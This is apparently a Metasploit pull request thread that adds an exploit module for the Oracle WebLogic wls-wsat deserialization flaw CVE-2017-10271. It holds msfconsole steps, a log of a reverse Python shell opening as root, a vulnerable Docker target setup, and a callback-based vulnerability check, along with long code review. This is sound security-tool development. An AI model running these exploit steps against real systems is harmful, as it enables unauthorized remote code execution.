Add CVE-2017-10271 / Oracle WebLogic wls-wsat RCE
rapid7/metasploit-framework pull request #9379
Opened 2018-01-05 20:11 UTC by kkirsche

Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce`
- [ ] `set RHOST <IP of host>`
- [ ] `set TARGET <target OS>`
- [ ] `set PAYLOAD <payload>`
- [ ] PAYLOAD options
- [ ]Shell should be received
- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

## Example
```
msf > use exploit/test/oracle_weblogic_wsat_deserialization_rce
msf exploit(oracle_weblogic_wsat_rce) > set RHOST REDACTED.com
RHOST => REDACTED.com
msf exploit(oracle_weblogic_wsat_rce) > set TARGET 1
TARGET => 1
msf exploit(oracle_weblogic_wsat_rce) > set PAYLOAD cmd/unix/reverse_python
PAYLOAD => cmd/unix/reverse_python
msf exploit(oracle_weblogic_wsat_rce) > set LHOST eth0
LHOST => eth0
msf exploit(oracle_weblogic_wsat_rce) > set LPORT 4444
LPORT => 4444
msf exploit(oracle_weblogic_wsat_rce) > exploit

[*] Started reverse TCP handler on REDACTED:4444
[*] Command shell session 1 opened (REDACTED:4444 -> REDACTED:46328) at 2018-01-05 15:08:56 -0500
uid=0(root) gid=0(root) groups=0(root)
```

## Setting up a target
The first server which Kevin used for exploit development was a docker container of Oracle WebLogic 10.3.6.0.0. Kevin used an existing image publicly available on Docker Hub.

To download and start the container, the following commands were used:

`docker run -d -p7001:7001 -p80:7001 zhiqzhao/ubuntu_weblogic1036_domain`

This starts the container and returns a SHA hash representing the container. Kevin identified the human-friendly name using the following command:

`docker ps`

For the purpose of this writeup, Kevin will assume the name is "trusting_raman". As Docker images are stripped down and do not include the same software as a normal machine, Kevin made a modification to the container, installing Python 2 to mirror what would be found in a normal Ubuntu machine. Kevin entered the container and installed this software using the following commands, confirming the installation when prompted:

```
docker exec -it trusting_raman /bin/bash
apt-get update
apt-get install python
```
At this point, changes to the host firewall may be necessary to expose port 80 and port 7001 to the outside world. This is out of scope for this pull request

2018-01-05 22:57 UTC, wchen-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +      'headers'  => { 'User-Agent': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50' }
Nice module! I am not sure if you know this already, but when you use #send_request_cgi, there should be an default user-agent already. The value also should be configurable for the user from msfconsole. Is there a reason why you had to hardcode this?

2018-01-05 23:06 UTC, kkirsche commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +      'headers'  => { 'User-Agent': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50' }
No reason whatsoever, I just didn't know that was the case. So just removing this and add the `OptString` for `UserAgent` or does it automatically get added?

2018-01-05 23:23 UTC, kkirsche commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +      'headers'  => { 'User-Agent': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50' }
Ah, it was in `show advanced`. This has been removed so that it can be handled via `#send_request_cgi` through the existing option

2018-01-06 04:32 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +        'Author'         => ['d3c3pt10n <d3c3pt10n[AT]deceiveyour.team>'],
Alexey Tyurin of ERPScan discovered the vuln. If you used someone else's PoC, please credit them as well. Thanks.

2018-01-06 04:35 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +            [ 'URL', 'http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html'],
Maybe link to https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html instead.

2018-01-06 04:39 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +            [ 'Unix Command payload', { 'Arch' => [ARCH_CMD], Platform => 'unix' } ],
Just `'Arch' => ARCH_CMD` is fine.

2018-01-06 04:41 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +        'Platform'      => %w{ win linux unix },
You can remove `linux`, since there are no `cmd/linux` payloads, only `cmd/unix`.

2018-01-06 04:42 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +            [ 'Linux Command payload', { 'Arch' => [ARCH_CMD], Platform => 'linux' } ]
You can remove this target because of https://github.com/rapid7/metasploit-framework/pull/9379/files#r160017522.

2018-01-06 04:43 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +          'DisableNops' => true
Don't need this.

2018-01-06 04:44 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +      OptInt.new('TIMEOUT', [true, "The timeout in seconds", 10]),
I don't think this is used?

2018-01-06 04:46 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +      xml_prepared.gsub!(r[0], r[1])
Would something like https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts2_rest_xstream.rb#L105 work?

2018-01-06 04:49 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +    if target_os == 0
You can compare against `target_platform` instead.

2018-01-06 04:50 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +    xml_payload = ''
Don't need this initialization.

2018-01-06 04:50 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +  def windows_payload
Consider consolidating this with `unix_payload` above and renaming.

2018-01-06 12:35 UTC, kkirsche commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +            [ 'URL', 'http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html'],
Updated

2018-01-06 12:36 UTC, kkirsche commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +        'Author'         => ['d3c3pt10n <d3c3pt10n[AT]deceiveyour.team>'],
This would go in the author line, even though their code or details weren't ever referenced? Seems strange to reference them in this way, but if you say so

2018-01-06 12:38 UTC, kkirsche commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +            [ 'Unix Command payload', { 'Arch' => [ARCH_CMD], Platform => 'unix' } ],
Adjusted, assuming that you meant `'Arch' => ARCH_CMD` instead of `'Arch' => [ARCH_CMD]`

2018-01-06 12:38 UTC, kkirsche commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +        'Platform'      => %w{ win linux unix },
Removed

2018-01-06 12:41 UTC, kkirsche commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +      OptInt.new('TIMEOUT', [true, "The timeout in seconds", 10]),
Removed as I don't know how to pass it to `send_request_cgi`

2018-01-06 12:43 UTC, kkirsche commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +    xml_payload = ''
Fixed

2018-01-06 13:04 UTC, kkirsche commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +      xml_prepared.gsub!(r[0], r[1])
Oh, cool. Changed

2018-01-06 13:13 UTC, kkirsche commented
Feedback has been implemented and code has been re-verified against a target host to ensure it functions as expected.

2018-01-07 18:24 UTC, wchen-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +      'headers'  => { 'User-Agent': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50' }
👍

2018-01-08 00:51 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +        'Author'         => ['d3c3pt10n <d3c3pt10n[AT]deceiveyour.team>'],
It's SOP to use the `Author` field for all credits. You put a comment by each name saying what they contributed. Agreed that this field is overloaded. Perhaps it should be called `Contributors`.

2018-01-08 00:53 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +      OptInt.new('TIMEOUT', [true, "The timeout in seconds", 10]),
It's the second parameter after the options hash.

```
337   def send_request_cgi(opts={}, timeout = 20, disconnect = true)
```

2018-01-08 01:23 UTC, kkirsche commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +        'Author'         => ['d3c3pt10n <d3c3pt10n[AT]deceiveyour.team>'],
Ah, ok. Contributors would have made more sense to me. Either way, not a big deal. Don't mind giving them credit, just wasn't clear that's how the field was used from the name

2018-01-08 01:23 UTC, kkirsche commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +      OptInt.new('TIMEOUT', [true, "The timeout in seconds", 10]),
Thank you. Re-added and defaulted to match the default of `send_request_cgi`

2018-01-08 19:17 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +            ['POC', 'https://github.com/Luffin/CVE-2017-10271'],
These two lines are a creative use of the `References` field, but it isn't intended for arbitrary identifiers. Please use `URL` and leave a comment per line.

I will admit this looks pretty cool:

```
References:
  https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html
  POC (https://github.com/Luffin/CVE-2017-10271)
  Standalone Exploit (https://github.com/kkirsche/CVE-2017-10271)
  https://cvedetails.com/cve/CVE-2017-10271/
  https://www.exploit-db.com/exploits/43458
```

Perhaps we can add something for `POC` as we did for `AKA`.

2018-01-08 19:30 UTC, kkirsche commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +            ['POC', 'https://github.com/Luffin/CVE-2017-10271'],
Ah, ok. Sorry about that, I wasn't clear on how that worked. I had, incorrectly, assumed that it would do something like map key value pairs and print them in a format such as
```
key: value
key: value
```

I've updated this to use `URL` with comments in the source to denote what each link is for.

2018-01-11 03:13 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +  Rank = NormalRanking
Consider writing a `check` method and/or bumping this rank. It looks like it's a carryover from `modules/exploits/example.rb`.

2018-01-11 03:16 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +      return 'cmd'
Consider dropping explicit returns and using a ternary operator.

https://github.com/bbatsov/ruby-style-guide#no-explicit-return
https://github.com/bbatsov/ruby-style-guide#ternary-operator

2018-01-11 03:17 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +  Rank = NormalRanking
You can find a detailed explanation - guidelines - on exploit ranking here: https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking.

2018-01-11 03:19 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +      OptInt.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]),
You can use the following shortcut:

```
Opt::RPORT(7001, true, 'The remote port that the WebLogic WSAT endpoint listens on')
```

2018-01-11 03:19 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +      OptInt.new('TIMEOUT', [true, "The timeout value of requests to RHOST", 20])
Consider `OptFloat` if you would like fractional seconds.

2018-01-11 03:20 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +    if target_platform == 'win'
Same as above.

2018-01-11 03:21 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +    xml_payload = process_builder_payload
If you've left this variable for clarity, that's fine. You can probably drop it, though. `send_request_cgi` can take `process_builder_payload` directly.

2018-01-11 13:09 UTC, kkirsche commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +  Rank = NormalRanking
So I know how to do the check, not within Metasploit / Ruby though. The problem that I have with the check payload is that I need to catch an HTTP request from the target to do so. The check payload will cause the remote host to send a new (not a response to our request) HTTP request to the payload address. If this occurs, then we know it's vulnerable. 

In terms of rankings, would you agree this is ExcellentRanking then, simply because excellent states it won't crash the service which should always be the case here.

2018-01-11 13:12 UTC, kkirsche commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +      return 'cmd'
I'll make this change, though it's something I usually will not include in code. In my experience both newer developers and developers who don't use them often (which is a wide group), ternary operators add confusion with minimal gain in terms of LoC.

2018-01-11 13:13 UTC, kkirsche commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +      OptInt.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]),
Changed, though I do think the inconsistency between option format detracts rather than helps

2018-01-11 13:13 UTC, kkirsche commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +      OptInt.new('TIMEOUT', [true, "The timeout value of requests to RHOST", 20])
changed

2018-01-11 13:13 UTC, kkirsche commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +    if target_platform == 'win'
Changed

2018-01-11 13:14 UTC, kkirsche commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +  Rank = NormalRanking
This Golang scanner that I wrote is an example of what I mean, running the HTTP server inside a thread (goroutine more specifically) and then sending the payload in a different thread.

https://github.com/kkirsche/CVE-2017-10271/blob/master/scanners/cmd/root.go

2018-01-11 13:17 UTC, kkirsche commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +    xml_payload = process_builder_payload
Changed

2018-01-11 14:04 UTC, kkirsche commented
Seems `OptFloat` broke something, but the test failure message is not helpful. What does this mean?

```
 1) modules it should behave like all modules with module type can be instantiated exploit multi/http/oracle_weblogic_wsat_deserialization_rce can be instantiated
     Failure/Error: module_eval(module_content, module_path)
     
     SyntaxError:
       /home/travis/build/rapid7/metasploit-framework/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb:54: syntax error, unexpected tCONSTANT, expecting ']'
             OptFloat.new('TIMEOUT', [true, "The ti
                     ^
       /home/travis/build/rapid7/metasploit-framework/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb:55: syntax error, unexpected ']', expecting keyword_end
           ])
            ^
       /home/travis/build/rapid7/metasploit-framework/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb:126: syntax error, unexpected end-of-input, expecting keyword_end
     Shared Example Group: "all modules with module type can be instantiated" called from ./spec/modules_spec.rb:16
     # ./lib/msf/core/modules/loader/base.rb:50:in `module_eval'
     # ./lib/msf/core/modules/loader/base.rb:50:in `module_eval_with_lexical_scope'
     # ./lib/msf/core/modules/loader/base.rb:139:in `block in load_module'
     # ./lib/msf/core/modules/loader/base.rb:540:in `namespace_module_transaction'
     # ./lib/msf/core/modules/loader/base.rb:176:in `load_module'
     # ./spec/support/shared/contexts/msf/simple/framework/modules/loading.rb:92:in `expect_to_load_module_ancestor'
     # ./spec/support/shared/contexts/msf/simple/framework/modules/loading.rb:112:in `block in expect_to_load_module_ancestors'
     # ./spec/support/shared/contexts/msf/simple/framework/modules/loading.rb:111:in `each'
     # ./spec/support/shared/contexts/msf/simple/framework/modules/loading.rb:111:in `expect_to_load_module_ancestors'
     # ./spec/support/shared/contexts/msf/simple/framework/modules/loading.rb:150:in `load_and_create_module'
     # ./spec/support/shared/examples/all_modules_with_module_type_can_be_instantiated.rb:27:in `block (5 levels) in <top (required)>'
```

2018-01-11 15:01 UTC, kkirsche commented
...the error was because I was missing a comma. Sorry about that

2018-01-11 20:40 UTC, asoto-r7 commented
Thanks @kkirsche for the quick turnaround.  One more change to fix a bug that keeps this from working on Windows targets.

Also, I've whipped up some documentation with examples and a walkthrough of how to set up vulnerable hosts.  Feel free to take a look and provide feedback:  https://gist.github.com/asoto-r7/de46867ed206292f1eddf24fda0db7f8

2018-01-11 20:41 UTC, asoto-r7 requested changes

2018-01-11 20:41 UTC, asoto-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +    target_platform == 'win' ? 'cmd' : '/bin/sh'
TL;DR: Change `cmd_base()` and `cmd_opt()` to compare against `target['Platform']` instead of `target_platform`.

---

This check always fails, because `target_platform` will never match 'win', so we'll always default to 'unix'.  For example, run `set TARGET 0` (Windows) and use the `pry` command to take a look under the hood:

```
msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Command payload
   1   Unix Command payload

msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set TARGET 0
msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > pry

   [1] pry(...)> target_platform.class
   => Msf::Module::PlatformList

   [2] pry(...)> target_platform == "win"
   => false
```

So even though we've chosen a Windows target, the check fails.

I think what you were looking for was `target['Platform']`

```
[3] pry(...)> target
=> #<Msf::Module::Target:0x00007ffcdf568d88
 @arch=["cmd"],
 @name="Windows Command payload",
 @opts={"Arch"=>"cmd", "Platform"=>"win"},
 @platform=#<Msf::Module::PlatformList:0x00007ffcdf568d38 @platforms=[Msf::Module::Platform::Windows]>,
 @ret=nil,
 @save_registers=nil>

[4] pry(...)> target['Platform']
=> "win"

[5] pry(...)> target['Platform'] == 'win'
=> true
```

To make sure this works in both Unix and Windows, let's run the check with different `TARGET` settings:

```
msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set TARGET 0
TARGET => 0
msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > pry
   [1] pry(...)> target['Platform'] == 'win'
   => true
   [2] pry(...)> exit

msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set TARGET 1
TARGET => 1
msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > pry
   [1] pry(...)> target['Platform'] == 'win'
   => false
   [2] pry(...)> exit
```

2018-01-11 20:41 UTC, asoto-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +    target_platform == 'win' ? '/c' : '-c'
Same as above.

2018-01-11 20:44 UTC, kkirsche commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +    target_platform == 'win' ? '/c' : '-c'
Updated

2018-01-11 20:44 UTC, kkirsche commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +    target_platform == 'win' ? 'cmd' : '/bin/sh'
Updated

2018-01-11 21:03 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +  Rank = NormalRanking
You can `include Msf::Exploit::Remote::HttpServer` if you need an HTTP server. You can define an `on_request_uri` method to handle requests.

`ExcellentRanking` is probably appropriate here.

2018-01-11 21:05 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +      return 'cmd'
I agree with you. Please don't feel you need to change something because I said so! It's certainly more readable and less error-prone to write an `if` statement. For something as simple as this, I merely wanted to suggest the option.

2018-01-11 21:06 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +      return 'cmd'
Feel free to revert the change if you'd like. And FWIW, I also think explicit `return` statements and parentheses around method definitions and invocations offer more clarity than not. :-)

2018-01-11 21:11 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +      OptInt.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]),
That's more than fair. The shortcut is there for you to use it, but I would normally use it for something like `Opt::RPORT(7001)`, not what you require. Please just change `OptInt` to `OptPort`.

2018-01-11 21:13 UTC, kkirsche commented
The documentation looks good. If it helps, I made a standalone container and installed Python as documented and named it after the CVE. Less steps for anyone interested:

https://hub.docker.com/r/kkirsche/cve-2017-10271/

Not a necessary change though unless you think it helps to reduce the number of steps. Overall though, looks good.

I saw @wvu-r7 commented about requests, I'm going to take a look and see if I can use what was said to implement the check. Not sure I will be able to, but worth trying.

2018-01-11 21:14 UTC, wvu-r7 commented
@kkirsche: I left a couple followup comments on style. tl;dr I agree with you.

2018-01-11 21:18 UTC, kkirsche commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +      return 'cmd'
I think this one I'm going to revert. I know for myself at least this it's simpler to read the if / else / end. I appreciate the suggestions though. Need to learn how R7 prefers to give commentary, every project is slightly different 👍

2018-01-11 21:34 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +    target_platform == 'win' ? 'cmd' : '/bin/sh'
My apologies. I forgot it returned a `PlatformList`, which isn't ideal for string comparisons but rather comparison of platform classes. `target['Platform']` is correct.

2018-01-11 21:44 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +      return 'cmd'
The project generally follows the Ruby style guide as linked in our `CONTRIBUTING.md` doc, but we each have our own style preferences - that's unavoidable. You won't find that we're religious about it. Cheers!

2018-01-11 22:27 UTC, kkirsche commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +  Rank = NormalRanking
Ah, that was what I needed. I've added `check`

2018-01-11 22:37 UTC, kkirsche commented
Added `check` based on feedback from @wvu-r7. I've verified this on a server:

```
msf exploit(oracle_weblogic_wsat_deserialization_rce) > set RHOST redacted.redacted.com
RHOST => redacted.redacted.com
msf exploit(oracle_weblogic_wsat_deserialization_rce) > set SRVPORT 4444
SRVPORT => 4444
msf exploit(oracle_weblogic_wsat_deserialization_rce) > set URIPATH /cve-2017-10271-check
URIPATH => /cve-2017-10271-check
msf exploit(oracle_weblogic_wsat_deserialization_rce) > check

[*] Using URL: http://0.0.0.0:4444/cve-2017-10271-check
[*] Local IP: http://redacted:4444/cve-2017-10271-check
[*] Sending the check payload...
[*] Waiting 10 seconds to see if the target requests our URI...
[+] redacted.redacted.com:7001 The target is vulnerable.
``` 

On the flip side:
```
msf exploit(oracle_weblogic_wsat_deserialization_rce) > set RHOST pdcncs-sc01.vzbi.com
RHOST => notvuln.redacted.com
msf exploit(oracle_weblogic_wsat_deserialization_rce) > set RPORT 443
RPORT => 443
msf exploit(oracle_weblogic_wsat_deserialization_rce) > set SRVPORT 4444
SRVPORT => 4444
msf exploit(oracle_weblogic_wsat_deserialization_rce) > check

[*] Using URL: http://0.0.0.0:4444/SHfZU9Jvk6ey36
[*] Local IP: http://redacted:4444/SHfZU9Jvk6ey36
[*] Sending the check payload...
[*] Waiting 10 seconds to see if the target requests our URI...
[*] notvuln.redacted.com:443 The target is not exploitable.
```

2018-01-11 22:50 UTC, asoto-r7 approved these changes

2018-01-11 23:17 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +    return_request_url = "http://#{lookup_actual_host}:#{datastore['SRVPORT']}#{datastore['URIPATH']}"
I think you can use `get_uri` here instead.

2018-01-11 23:18 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +  def lookup_actual_host()
Don't need this if you use `get_uri` above, but this is normally taken care of in `srvhost_addr`.

2018-01-11 23:28 UTC, kkirsche commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +    return_request_url = "http://#{lookup_actual_host}:#{datastore['SRVPORT']}#{datastore['URIPATH']}"
Fixed

2018-01-11 23:28 UTC, kkirsche commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +  def lookup_actual_host()
Fixed / removed

2018-01-11 23:29 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +    datastore['URIPATH'] = datastore['URIPATH'] || random_uri
I don't think you need all of this? Was this copied from another module?

2018-01-11 23:29 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +    start_service({'Uri' => {
Just `start_service` should be fine?

2018-01-11 23:31 UTC, kkirsche commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +    datastore['URIPATH'] = datastore['URIPATH'] || random_uri
I added this when I got a null error cause I didn't set the URIPATH. It is copied though

2018-01-11 23:32 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +    datastore['URIPATH'] = '/' + datastore['URIPATH'] if datastore['URIPATH'] !~ /^\//
This line included. Btw, this should already be handled in the library if you use the helper methods.

2018-01-11 23:34 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +    while (not @received_request)
`until @received_request` or `while @received_request.nil?` or `while !@received_request` or... up to you.

2018-01-11 23:36 UTC, kkirsche commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +    while (not @received_request)
Will change this to `until @received_request`

2018-01-11 23:40 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +    @received_request = true
Maybe you can check that the request matches known values. Is there a user agent you can compare against? If your resource is random (the default), that should mitigate passersby, too.

2018-01-11 23:44 UTC, asoto-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +    @received_request = true
Not sure about this one -- the User-Agent may not be stable.  In my environment, the Windows User-Agent is: `Java1.6.0_29` and Ubuntu's User-Agent is `Java1.6.0_45`.

2018-01-11 23:45 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +    datastore['URIPATH'] = datastore['URIPATH'] || random_uri
I think `get_resource` should take care of you, but you shouldn't need to set `URIPATH` like this. It's for the user to set.

2018-01-11 23:46 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +    start_service({'Uri' => {
You can access relevant info about the started service using the helper methods in the library.

2018-01-11 23:53 UTC, kkirsche commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +    @received_request = true
I don't have enough examples to know if it'd be possible to check. The only idea I'd have would be maybe

```
if request.headers['User-Agent'] =~ /Java.*/
```

But I don't know for sure how stable that is

2018-01-11 23:55 UTC, kkirsche commented
Updated with the latest feedback. Simplified to just `start_service`, use `until` instead of `while not`, and remove `datastore['URIPATH']` that I don't need due to helper method. Re-verified it

2018-01-11 23:59 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +    @received_request = true
Let's not bother. A "secret" resource is enough. `on_request_uri` shouldn't be triggered unless the client knows the resource.

2018-01-12 00:07 UTC, wvu-r7 commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +      if (waited > datastore['HTTP_DELAY'])
You can drop the parens here. That much is definitely Ruby style.

Additionally, it may be worth it to `stop_service` early, since I don't like relying on the oft-overloaded `cleanup` method.

2018-01-12 00:12 UTC, kkirsche commented
Attempted to update documentation for you @asoto-r7:
https://gist.github.com/kkirsche/2118abd0898fed769bbe0279cbcc21f4

The one typo I noticed when I read through it closer was:

```
 Install a container running Ubuntu 16.04 and WebLogic 1.0.36:
```

says `1.0.36` instead of `10.3.6.0`

2018-01-12 00:16 UTC, wvu-r7 commented
Feel free to PR the doc to @kkirsche when you're ready, @asoto-r7. My review here is complete.

I apologize for making this such a grueling process, @kkirsche! I want to thank you for this first contribution. Hope you return. :)

In your very capable hands now, @asoto-r7. Thanks!

2018-01-12 00:16 UTC, kkirsche commented on modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
> +      if (waited > datastore['HTTP_DELAY'])
Added `stop_service` before each `return` and dropped the parenthesis. That's just leftover from https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/novell/netiq_pum_eval.rb#L279

2018-01-12 00:20 UTC, kkirsche commented
Thanks for your each of your patience — definitely plan to return after I finish up the OSCP (hopefully that'll be this weekend). Looking forward to hopefully contributing more as I continue to dig into exploit development. It's a great opportunity to get feedback from experienced people and grow as a pentester and developer.

2018-01-12 02:45 UTC, wvu-r7 commented
Good luck on OSCP!

2018-01-12 20:12 UTC, kkirsche commented
@asoto-r7 do you want me to pull in the documentation from the gist into this PR for you? Just let me know how best to help and I'll do my best to follow through on whatever is needed

2018-01-12 20:31 UTC, wvu-r7 commented
If @asoto-r7's branch is PR'd to your PR, you can keep his commits, which I think are valuable for history and attribution.

2018-01-12 20:48 UTC, kkirsche commented
Documetnation typo I think:

```
The startWevLogic.cmd should run immediately after the installer and present logging output. Once running, the window should output a line similar to the following
```

I think `startWevLogic.cmd` should be `startWebLogic.cmd`

2018-01-16 01:33 UTC, wchen-r7 commented
To mix HttpServer and HttpClient, you have to write the module in a pretty unusual way. We tried to document this here (with an example):
https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-module-using-HttpServer-and-HttpClient

Another approach is you include the HttpServer mixin, and then you use Rex to make HTTP requests. Here are the necessary docs to read about how to do that:
https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-HttpServer
https://github.com/rapid7/metasploit-framework/wiki/How-to-send-an-HTTP-request-using-Rex%3A%3AProto%3A%3AHttp%3A%3AClient

I hope this helps!

2018-01-18 18:05 UTC, kkirsche commented
Why is the SSL version parameter in `cli = Rex::Proto::Http::Client.new(rhost, rport, {}, true, 8181, proxies, 'username', 'password')` `8181` instead of one of the defined values (`SSL2, SSL3, or TLS1`) in the description?

2018-01-18 18:21 UTC, kkirsche commented
